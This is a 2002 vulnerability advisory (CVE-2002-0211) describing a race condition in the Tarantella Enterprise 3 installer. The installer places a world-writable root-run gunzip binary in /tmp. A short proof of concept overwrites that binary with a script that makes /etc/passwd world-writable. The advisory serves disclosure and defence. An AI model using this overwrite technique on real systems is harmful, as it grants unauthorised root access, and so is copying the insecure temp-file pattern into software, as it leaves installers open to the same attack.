Advisory #: 44
Title: local root during installation of Tarantella Enterprise 3
Author: Larry W. Cashdollar, @_larry0
Date: 2002-01-14
CVE-ID:[CVE-2002-0211]
CWE:
Download Site: http://www.tarantella.com/download
Vendor: http://www.tarantella.com
Vendor Notified: 2002-01-14
Vendor Contact: unkown
Advisory: http://www.vapid.dhs.org/advisories/tarentalla_race_condition_during_install.html
Description: Tarantella, a supplier of Internet infrastructure software, has released Tarantella Enterprise 3, version 3.2, positioned as a managed, secure application access product that provides authorization, authentication, and accountability for enterprise systems. The software supplies integrated, managed, and secure access to server-based applications through a Web browser. This iteration of the Tarantella software focuses on security, performance, and network optimization while allowing fast and simple integration with existing corporate infrastructures.
Vulnerability:
The installation script provided with tarentella handles utility packages during installation insecurely. A root owned binary "gunzip" is created in /tmp with world writeable permissions, the pid is appended to the filename. TMP_GUNZIP=$TMPDIR/gunzip$$ $ ls -l /tmp/gunzip16152 --rwxrwxrwx 1 root root 51808 Jan 14 00:15 gunzip16152 gunzip is extracted: extract gunzip > "$TMP_GUNZIP" 2>>$SHXLOGFILE extract gunzip | uncompress > "$TMP_GUNZIP" 2>>$SHXLOGFILE The permissions of gunzip are changed to rwx for all: chmod 777 $TMP_GUNZIP >/dev/null 2>&1 The binary is used during installation: extract $efilename | $TMP_GUNZIP -q > "$efilename"
Export: JSON TEXT XML
Exploit Code:
  1. There is a race condition between when gunzip is extracted and used during installation. At which time a malicious local user could inject code to compromise the system quickly.
  2.  
  3. $ echo "#!/bin/sh" > /tmp/test.sh
  4. $ echo "chmod 777 /etc/passwd" >> /tmp/test.sh
  5.  
  6. $ cat /tmp/test.sh > /tmp/gunzip16152
  7.  
  8. I was able to change the permissions of /etc/passwd to 777 by performing the above as an non administrative user.
  9.  
Screen Shots:
Notes:
13949